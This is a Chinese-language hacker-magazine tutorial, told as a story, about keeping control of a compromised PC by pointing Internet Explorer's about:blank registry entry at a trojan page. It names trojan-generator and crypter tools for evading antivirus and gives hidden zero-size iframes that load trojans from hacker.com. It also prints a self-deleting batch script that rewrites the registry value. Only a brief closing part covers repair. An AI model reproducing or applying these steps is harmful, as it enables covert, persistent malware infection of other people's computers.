攻防博弈第九幕:留住肉鸡 网页木马隐于注册表
网络安全
博弈主题:网页木马
技术难度:★★★
重点知识:利用注册表修改IE空白页隐藏木马
作为一个黑客,在辛苦取得肉鸡之后,如何长期有效地控制肉鸡,如何让肉鸡永远无法逃脱黑客的控制是每一个黑客最关注的问题!埃德为了远程控制自己的内鸡,采取了注册表藏毒法。
上期黑客K通过网络钓鱼获得了小蝶的论坛账号和密码,顺藤摸瓜黑客K发现不是小蝶查阅过自己的邮箱、论坛、网络硬盘等,哪到底是谁干的呢?
一个月前,黑客埃德与XX公司的老板达成协议:埃德必须弄清楚UU公司和TT公司的合作底线是什么,为最后的谈判取得主动权。埃德替XX公司干并不仅仅是为了钱,以前TT公司的杜金就找过自己,但因为自己开价太高,杜金选择了黑客K,这让埃德非常愤怒,他要让杜金知道什么叫“物有所值”。
埃德通过一个0Day漏洞成功入侵了黑客K的电脑,入侵成功之后他一直在思考如何长久地将黑客K的电脑控制在自己的手中,此前他曾设想过无数的方法,包括将黑客K电脑中的部分常用软件捆绑上木马,替换掉以前真实的软件,然而这让他感觉不保险,他需要一个更加完美的计划。
小知识:0Day漏洞通常是指尚没有补丁的漏洞,首先提供该漏洞利用程序的人通常是该漏洞的首发者或是第一个公开该漏洞利用细节的人。
注册表藏“马”奥秘
埃德不断搜寻着各种长久隐藏木马保存肉鸡的手段,但是没有一种解决方式适用于黑客K这种高手,对付他,埃德需要更加隐蔽的手段。在进入一个黑客网站后,网页突然弹出一个对话框,提示埃德是否要将该网站保存到收藏夹中并设为首页,在快速点击否定后,埃德的脑海中突然闪现了一个计谋,一个长久让黑客K成为自己肉鸡的计谋。
正是网站默认首页的提示启示了埃德,他突然有一个惊人的想法,通过黑客K电脑中IE浏览器默认的首页进行挂马。在IE浏览器中,默认空白页是通过系统中一个DLL文件进行调用的,埃德计划将相关数据进行修改,精心布置出一个看似没有变化的默认空白页挂马陷阱。这样即便黑客K将自己的木马杀掉后,他再次打开浏览器的默认空白页,也会再次中招。
小知识:DLL的全称是Dynamic Link Library, 中文叫做动态链接文件,是一种可执行文件。在Windows操作系统中, DLL对于程序执行是非常重要的, 因为程序在执行的时候, 必须链接到DLL文件, 才能够正确地运行。
IE浏览器默认空白页在地址栏中的URL链接为“About:blank”,这其中“Aobut”是协议名,与FTP之类的网络协议一样,而后面的“Blank”则是协议调用的资源,也就是IE浏览器默认的空白页。
埃德如果把黑客K电脑中的空白页修改成自己的网页木马地址,那么他必须首先找到Blank空白页的源头。想要窜改IE浏览器中的空白页面可以通过修改注册表来完成,在“开始”菜单中点击“运行”选项后,在弹出的窗口中输入“Regedit”调出注册表编辑器。
然后找到[HKEY_LOCAL_MA CHINE\SOFTWARE\Microsoft\Inter net Explorer\AboutURLs]项目,在这个项目中包含有一个名为“Blank”的字符串(图1)。IE浏览器正是通过这个字符串调用空白页面资源的,调用Blank空白页面的命令是“res://mshtml.dll/blank.htm”。
埃德知道,只要将黑客K电脑系统注册表中的“res://mshtml.dll/blank.htm”数值修改为“http://www.hacker.com/”,那么黑客K双击打开浏览器空白页面时,IE默认开启了埃德预设的网址——思路非常清晰。埃德决定通过窜改黑客K的注册表将他电脑中的默认空白页加入自己的网页木马。
启动IE自动激活木马
埃德首先调出《邪恶网马生成器》,之所以选择它是因为这款软件可以生成图片网页木马、迅雷网页木马、MS0704三种网页木马,功能非常强大。在配置对话框中输入了木马地址后,点击“生成”,网页木马的制作就完成了。埃德为了让这些网页木马的免杀能力进一步提高,又打开《皇后网马加密器》,在生成出的网页木马后点击“加密”按键进行加密(图2),然后上传到自己的服务器中。
网页木马上传完成后,埃德用Windows操作系统中的记事本新建了“Blank.html”文件,然后在该文件中用IFRAME写好调用网页木马的代码:
<iframe src="http://www.hacker.com/muma1.html" width=0 height=0></iframe>
<iframe src="http://www.hacker.com/muma2.html" width=0 height=0></iframe>
<iframe src="http://www.hacker.com/muma3.html" width=0 height=0></iframe>
<iframe src="http://www.hacker.com/muma4.html" width=0 height=0></iframe>
Blank.html代码写好后,埃德将它上传到了黑客K的系统目录中,然后通过远程注册表管理将黑客K注册表[HKEY_LOC AL_MACHINE\SOFTWARE\Microsoft\ Internet Explorer\AboutURLs]项的Blank数值修改为“file:///%systemroot%\blank.html”。
经过此番修改后,黑客K即便杀死了自己系统中的木马,但是在开启IE浏览器之后,木马依旧会死灰复燃,而巧妙的隐藏方法则很不容易被发现。事后埃德又制作了一个批处理文件,通过这个批处理文件,系统会首先写一个页面到文件中,然后删除注册表中管理空白页面的字符串,最后导入自己制作的空白页面。今后所有的步骤都可以自动实现,无须远程调用黑客K的注册表。代码如下:
@echo off
echo <html> >>hacker.txt
echo <head> >>hacker.txt
echo <title>空白页</title> >>hacker.txt
echo </head> >>hacker.txt
echo <a herf="www.hacker.com"></a> >>hacker.txt
echo </html> >>hacker.txt
copy hacker.txt %systemroot%\system32\hacker.html
Reg delete "hklm\software\microsoft\internet explorer\abouturls" /v blank /f
reg add "hklm\software\microsoft\internet explorer\abouturls" /v blank /t reg_sz /d "file:///%systemroot%\system32\hacker.html"
del hacker.txt /y
del hacker.bat /y
修复IE的症结
黑客K可以将自己的IE浏览器升级为7.0或者8.0来实现躲避这种窜改方法。另外,也可以通过《360安全卫士》对IE浏览器进行修复,点击软件 “高级”选项中的“立即修复”按钮(图3),就可以还原默认首页的指向。
黑客K受命用洪水攻击方式攻击没有给己方项目承包权的XX公司的网站,却不知道有人已经盯上他了……